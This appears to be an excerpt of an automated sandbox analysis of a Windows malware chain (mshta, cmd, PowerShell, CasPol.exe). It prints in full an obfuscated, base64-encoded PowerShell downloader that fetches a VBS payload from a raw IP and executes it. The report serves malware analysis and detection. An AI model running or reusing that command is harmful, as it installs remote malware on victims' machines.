                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000008.00000002.2487827556.000000000635E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: $.NET CLR 3.5.30729.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32Bn source: powershell.exe, 00000003.00000002.2235367195.000000000803B000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.2487654927.0000000004790000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2519960382.0000000006CF0000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000008.00000002.2487827556.000000000635E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: q:C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.pdb source: powershell.exe, 00000003.00000002.2229203641.0000000004C97000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000008.00000002.2487827556.000000000635E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000008.00000002.2487827556.000000000635E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+b source: powershell.exe, 00000008.00000002.2487827556.000000000635E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.2487654927.0000000004790000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2519960382.0000000006CF0000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000008.00000002.2487827556.000000000635E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.2487654927.0000000004790000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: system.runtime.compilerservicesisreadonlyattributednlib.dotnet.mdrawtypespecrowdnlib.dotnetfielddefuserdnlib.dotnetinterfacemarshaltypefa`1hyhxdnlib.dotnet.writermetadataflagsdnlib.dotnet.mdrawfieldlayoutrowhzmicrosoft.win32.taskschedulertaskhuhthwdnlib.dotnet.writermetadataoptionshvhqdnlib.dotnetimdtokenproviderhphshrdnlib.dotnetsignatureequalitycomparermicrosoft.win32.taskschedulerquicktriggertypeilimdnlib.dotnetifullnamecreatorhelperinioihiidnlib.dotnet.resourcesresourceelementdnlib.dotnetmodulecreationoptionsijikiddnlib.dotnet.emitiinstructionoperandresolverieigdnlib.utilslazylist`1iaibdnlib.dotnetpropertyattributesicdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamixiydnlib.dotnetclasssigizdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionitiuelemequalitycompareriviwipiqdnlib.dotnet.mdrawpropertyptrrowirisdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskscheduler
customtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotjojndnlib.dotnet.pdbsymbolreadercreatorjmjldnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerjkjjdnlib.dotnet.mdimagecor20headerjidnlib.dotne
                      Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000008.00000002.2487827556.000000000635E000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))"
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'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'+[chAr]0X22+'))')))"
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))"
                      Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $combo = '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';$prason = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($combo));Invoke-Expression $prason
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.cmdline"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 12_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041BCE3
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_047C42D2 push ebx; ret 3_2_047C42DA
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_047C12A0 push ss; iretd 3_2_047C12AF
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_02E1724F push ecx; iretd 8_2_02E1725A
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_02E1B209 push esi; iretd 8_2_02E1B216
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_02E18340 push edx; iretd 8_2_02E1834E
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_02E1B14D push esi; iretd 8_2_02E1B14E
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_02E1864D push ecx; iretd 8_2_02E1864E
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_02E1B615 push ecx; iretd 8_2_02E1B616
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_02E18725 push esp; iretd 8_2_02E18726
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_02E19704 push esi; iretd 8_2_02E19706
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_02E1870D push esp; iretd 8_2_02E1870E
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_02E184A0 push ecx; iretd 8_2_02E1854E
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_02E18450 push edx; iretd 8_2_02E1849E
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_02E195AD push esi; iretd 8_2_02E195AE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_02E18540 push ebx; iretd 8_2_02E185A0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_02E1AF35 push esi; iretd 8_2_02E1AF37
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_02E1CDC4 push esp; iretd 8_2_02E1CDD1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_02E1CDD3 push esp; iretd 8_2_02E1D1D5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 12_2_004567E0 push eax; ret 12_2_004567FE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 12_2_0045B9DD push esi; ret 12_2_0045B9E6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 12_2_00455EAF push ecx; ret 12_2_00455EC2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 12_2_00433FF6 push ecx; ret 12_2_00434009
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 12_2_00406128 ShellExecuteW,URLDownloadToFileW,12_2_00406128
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 12_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_00419BC4

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 12_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041BCE3
                      Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
